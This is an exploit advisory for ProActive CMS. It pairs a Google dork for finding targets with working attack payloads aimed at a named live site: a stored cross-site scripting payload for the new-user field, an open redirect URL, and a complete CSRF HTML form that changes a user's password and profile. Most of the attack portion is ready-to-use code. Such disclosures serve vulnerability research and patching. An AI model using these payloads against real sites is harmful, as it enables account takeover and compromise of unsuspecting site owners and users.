# Exploit Title: ProActive CMS Multiple Vulnerabilities # Google Dork: intext:"Powered by Proactive CMS" # Exploit Author: Rafay Baloch # Vendor Homepage: http://www.proactivecms.com # Tested on: Linux Stored Cross Site Scripting: http://professional.inbusiness.com.au/admin.php?action=newuser Insert Your Payload: "><img src=x onerror=prompt(0);> The newuser field does not properly sanitize the input, resulting in a Stored XSS. An Open redirect issue also found: POC: http://professional.inbusiness.com.au/admin.php?action=http://rafayhackingarticles.net Just, replace http://rafayhackingarticles.net with your own domain. Missing CSRF Tokens: Most of the forms are missing with CSRF tokens, To be honest one of the most insecure cms i have ever seen. http://professional.inbusiness.com.au/admin.php?action=edituser&id=24 The following POC, could be altered to use it to alter a user's detail. <html> <body> <form action=" http://professional.inbusiness.com.au/admin.php?action=saveuser&id=24" method="POST"> <input type="hidden" name="groupreadvalue" value="" /> <input type="hidden" name="groupreadallvalue" value="" /> <input type="hidden" name="id" value="24" /> <input type="hidden" name="password1" value="tony123" /> <input type="hidden" name="firstname" value="Tony" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="initials" value="V" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="lastname" value="Badger" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="title" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="dob" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="email" value="tony&#46;badger&#64;sales&#46;fake&#46;com" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="telephone" value="&#43;13" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="mobile" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="fax" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="url" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="suburb" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="postcode" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="business&#95;name" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="division" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="position" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="building" value="" /> <input type="hidden" name="description" value="" /> <input type="hidden" name="x" value="30" /> <input type="hidden" name="y" value="10" /> <input type="hidden" name="groupReadList" value="&#44;Sales" /> <input type="submit" value="Submit form" /> </form> </body> </html> RHA: http://rafayhackingarticles.net http://twitter.com/rafaybaloch